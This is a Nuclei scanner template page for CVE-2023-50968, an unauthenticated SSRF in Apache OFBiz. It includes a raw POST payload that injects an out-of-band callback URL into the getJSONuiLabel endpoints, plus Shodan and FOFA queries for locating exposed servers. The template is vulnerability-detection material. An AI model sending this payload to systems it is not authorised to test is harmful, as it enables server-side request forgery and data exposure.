Skip to content
Nuclei Templates

Apache OFBiz < 18.12.11 - Server Side Request Forgery

ID: CVE-2023-50968

Severity: high

Author: your3cho

Tags: cve,cve2023,apache,ofbiz,ssrf

Description

Section titled “Description”

Arbitrary file properties reading vulnerability in Apache Software Foundation Apache OFBiz when user operates an uri call without authorizations. The same uri can be operated to realize a SSRF attack also without authorizations. Users are recommended to upgrade to version 18.12.11, which fixes this issue.

YAML Source

Section titled “YAML Source”
id: CVE-2023-50968


info:
  name: Apache OFBiz < 18.12.11 - Server Side Request Forgery
  author: your3cho
  severity: high
  description: |
    Arbitrary file properties reading vulnerability in Apache Software Foundation Apache OFBiz when user operates an uri call without authorizations. The same uri can be operated to realize a SSRF attack also without authorizations. Users are recommended to upgrade to version 18.12.11, which fixes this issue.
  reference:
    - https://lists.apache.org/thread/x5now4bk3llwf3k58kl96qvtjyxwp43q
    - http://www.openwall.com/lists/oss-security/2023/12/26/2
    - https://nvd.nist.gov/vuln/detail/CVE-2023-50968
    - https://issues.apache.org/jira/browse/OFBIZ-12875
    - https://ofbiz.apache.org/download.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-50968
    cwe-id: CWE-918,CWE-200
    epss-score: 0.23447
    epss-percentile: 0.96556
    cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: apache
    product: ofbiz
    shodan-query:
      - html:"OFBiz"
      - http.html:"ofbiz"
      - ofbiz.visitor=
    fofa-query:
      - app="Apache_OFBiz"
      - body="ofbiz"
      - app="apache_ofbiz"
  tags: cve,cve2023,apache,ofbiz,ssrf
variables:
  str: "{{rand_base(6)}}"


http:
  - raw:
      - |
        POST /partymgr/control/{{path}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        {{parameter}}={"http://{{interactsh-url}}/api":"{{str}}"}


    payloads:
      path:
        - getJSONuiLabel
        - getJSONuiLabelArray


      parameter:
        - requiredLabel
        - requiredLabels


    attack: clusterbomb
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"


      - type: word
        part: header
        words:
          - 'OFBiz.Visitor='
# digest: 4a0a00473045022100fca23d74433993d6639307ac85e0780e49612c2f6371ac0842a525c0e721ab39022053564998de3478ac54e3ec0155a2026b154acb5a0c30a143fc976d8b30adbb29:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-50968.yaml"

View on Github